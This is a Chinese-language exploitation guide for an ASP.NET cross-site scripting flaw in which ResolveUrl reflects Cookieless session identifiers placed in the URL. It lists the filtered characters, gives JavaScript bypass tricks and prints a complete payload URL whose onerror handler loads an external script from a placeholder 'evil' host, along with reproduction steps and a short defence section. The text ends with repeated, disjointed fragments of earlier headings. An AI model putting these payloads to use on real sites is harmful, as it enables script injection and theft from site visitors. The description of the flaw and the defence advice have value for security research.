ASP.NET XSS漏洞分析与利用指南<\/h1>

漏洞概述<\/h2>
本文详细分析了一个存在于ASP.NET框架中的XSS漏洞，该漏洞源于.NET框架对Cookieless Session和ResolveUrl方法的特殊处理方式。攻击者可以利用此漏洞在目标网站上执行任意JavaScript代码。<\/p>

技术背景<\/h2>

ResolveUrl方法<\/h3>

ASP.NET的ResolveUrl<\/code>方法用于解析相对于应用程序根目录的路径：<\/p>

<script src="<%= ResolveUrl("<\/span>~\/Script.js") %>"<\/span>><\/script>
<\/span><\/span><\/code><\/pre>该方法会将~<\/code>解析为应用程序根目录，例如：<\/p>

正常访问：http:\/\/localhost\/A\/B\/C\/default.aspx<\/code> → <script src="\/Script.js"><\/script><\/code><\/li>
子目录访问：路径会自动调整，保持资源可访问<\/li>
<\/ul>
Cookieless Session历史<\/h3>
在早期ASP.NET版本(1.0和1.1)中，Session State使用URL存储会话ID（称为"Cookieless"特性）。现代浏览器虽然使用Cookie存储会话，但ASP.NET仍保留了对Cookieless Session的支持。<\/p>
Cookieless标识符格式：<\/p>

(S(?))<\/code> - Session ID<\/li>
(A(?))<\/code> - Anonymous ID<\/li>
(F(?))<\/code> - Form Authentication Ticket<\/li>
<\/ul>
漏洞原理<\/h2>
关键发现：即使禁用Cookieless功能（Cookieless="UseCookies"<\/code>），ASP.NET仍会处理URL中的Cookieless标识符，并将其包含在ResolveUrl<\/code>的结果中。<\/p>
攻击示例：

访问http:\/\/localhost\/(A(ABCD))\/A\/B\/C\/default.aspx<\/code>会导致：<\/p>
<script<\/span> src<\/span>=<\/span>"\/(A(ABCD))\/Script.js"<\/span>><\/script<\/span>>
<\/span><\/span><\/code><\/pre>攻击者可以控制A(ABCD)<\/code>部分，插入恶意代码：<\/p>
http:\/\/localhost\/A\/B\/C\/(A(%22onerror=%22alert`1`%22))\/default.aspx
<\/span><\/span><\/code><\/pre>字符限制与绕过技术<\/h2>
被过滤的字符<\/h3>
以下字符会导致400或404错误：<\/p>

%<\/code> (0x25)<\/li>
&<\/code> (0x26)<\/li>
)<\/code> (0x29)<\/li>
*<\/code> (0x2a)<\/li>
+<\/code> (0x2b)<\/li>
\/<\/code> (0x2f)<\/li>
:<\/code> (0x3a)<\/li>
<<\/code> (0x3c)<\/li>
><\/code> (0x3e)<\/li>
?<\/code> (0x3f)<\/li>
\<\/code> (0x5c)<\/li>
<\/ul>
JavaScript绕过技术<\/h3>


使用模板字符串<\/strong>：用反引号代替引号<\/p>
var<\/span> text<\/span> =<\/span> `Hello`<\/span>
<\/span><\/span><\/code><\/pre><\/li>

字符串拼接<\/strong>：使用模板字符串插值<\/p>
console<\/span>.log<\/span>(`<\/span>${<\/span>'a'<\/span>}${<\/span>'b'<\/span>}${<\/span>'c'<\/span>}<\/span>`<\/span>) \/\/ 输出: abc
<\/span><\/span><\/span><\/code><\/pre><\/li>

函数调用<\/strong>：不使用括号<\/p>
alert<\/span>`1`<\/span>
<\/span><\/span><\/code><\/pre><\/li>

字符编码<\/strong>：使用String.fromCharCode<\/code>绕过斜杠限制<\/p>
String.fromCharCode<\/span>`47`<\/span> \/\/ 等于 '\/'
<\/span><\/span><\/span><\/code><\/pre><\/li>

动态执行<\/strong>：利用new Function<\/code>和location.hash<\/code><\/p>
new<\/span> Function`X<\/span>${<\/span>document.location<\/span>.hash<\/span>.substr<\/span>`1`<\/span>}<\/span>X`<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
完整攻击Payload<\/h2>
js<\/span> =<\/span> document.createElement<\/span>`script`<\/span>;
<\/span><\/span>js<\/span>.src<\/span>=<\/span>`<\/span>${<\/span>String.fromCharCode<\/span>`47`<\/span>}${<\/span>String.fromCharCode<\/span>`47`<\/span>}<\/span>evil<\/span>${<\/span>String.fromCharCode<\/span>`47`<\/span>}<\/span>XSS.JS`<\/span>;
<\/span><\/span>headEl<\/span>=<\/span>document.getElementsByTagName<\/span>`head`<\/span>[0<\/span>];
<\/span><\/span>new<\/span> Function`X<\/span>${<\/span>document.location<\/span>.hash<\/span>.substr<\/span>`1`<\/span>}<\/span>X`<\/span>;
<\/span><\/span><\/code><\/pre>对应的URL格式：<\/p>
http:\/\/localhost\/A\/B\/C\/(A("onerror="js=document.createElement`script`;js.src=`${String.fromCharCode`47`}${String.fromCharCode`47`}evil${String.fromCharCode`47`}XSS.JS`;headEl=document.getElementsByTagName`head`[0];new%20Function`X${document.location.hash.substr`1`}X`"))\/default.aspx#headEl.appendChild(js)
<\/code><\/pre>
受影响元素<\/h2>
除了script<\/code>标签外，以下元素也可能受影响：<\/p>
<link<\/span> href<\/span>=<\/span>"<%= ResolveUrl("<\/span>~\/<\/span>file<\/span>.<\/span>css<\/span>")<\/span> %<\/span>>" rel="stylesheet">
<\/span><\/span>" \/>
<\/span><\/span><a<\/span> href<\/span>=<\/span>"<%= ResolveUrl("<\/span>~\/<\/span>file<\/span>.<\/span>aspx<\/span>")<\/span> %<\/span>>">click<\/a<\/span>>
<\/span><\/span><\/code><\/pre>环境复现步骤<\/h2>


环境搭建<\/strong>：<\/p>

Windows 10系统<\/li>
安装Visual Studio 2019 Community版<\/li>
创建ASP.NET Web应用程序(.NET Framework)项目<\/li>
选择.NET Framework 4.x版本<\/li>
<\/ul>
<\/li>

测试代码<\/strong>：<\/p>
<\/li>
<\/ol>
<<\/span>%@ Page Language="C#" %>
<\/span><\/span><!DOCTYPE html><\/span>
<\/span><\/span><html<\/span> xmlns<\/span>=<\/span>"http:\/\/www.w3.org\/1999\/xhtml"<\/span>>
<\/span><\/span><head<\/span>>
<\/span><\/span>    <title<\/span>><\/title<\/span>>
<\/span><\/span>    <script<\/span> src<\/span>=<\/span>"<%= ResolveUrl("<\/span>~\/<\/span>Script<\/span>.<\/span>js<\/span>")<\/span> %<\/span>>"<\/span>><\/span><\/script<\/span>>
<\/span><\/span><\/head<\/span>>
<\/span><\/span><body<\/span>>
<\/span><\/span>    .NET version: <<\/span>%=Environment.Version%>
<\/span><\/span><\/body<\/span>>
<\/span><\/span><\/html<\/span>>
<\/span><\/span><\/code><\/pre>
测试URL<\/strong>：

基础测试：https:\/\/localhost:port\/(A(ABCD))\/xss.aspx<\/code><\/li>
简单弹窗：https:\/\/localhost:port\/(A("onerror="alert<\/code>1"))\/xss.aspx<\/code><\/li>
完整攻击：使用上述完整payload<\/li>
<\/ul>
<\/li>
<\/ol>
防御措施<\/h2>

禁用Cookieless Session功能（在web.config中设置cookieless="UseCookies"<\/code>）<\/li>
对ResolveUrl<\/code>的输出进行编码<\/li>
使用Content Security Policy (CSP)限制脚本来源<\/li>
输入验证和输出编码<\/li>
<\/ol>
总结<\/h2>
该漏洞利用了ASP.NET框架的两个历史特性：<\/p>

ResolveUrl<\/code>方法对~<\/code>的特殊处理<\/li>
对Cookieless Session标识符的向后兼容支持<\/li>
<\/ol>
通过精心构造的URL，攻击者可以完全控制资源路径，进而实现XSS攻击。虽然需要特定条件（使用ResolveUrl<\/code>方法），但在实际应用中相当常见，危害性较高。<\/p>

ASP.NET XSS漏洞分析与利用指南<\/h1>

漏洞概述<\/h2> 本文详细分析了一个存在于ASP.NET框架中的XSS漏洞，该漏洞源于.NET框架对Cookieless Session和ResolveUrl方法的特殊处理方式。攻击者可以利用此漏洞在目标网站上执行任意JavaScript代码。<\/p>

技术背景<\/h2>

字符限制与绕过技术<\/h2>

漏洞概述<\/h2>
本文详细分析了一个存在于ASP.NET框架中的XSS漏洞，该漏洞源于.NET框架对Cookieless Session和ResolveUrl方法的特殊处理方式。攻击者可以利用此漏洞在目标网站上执行任意JavaScript代码。<\/p>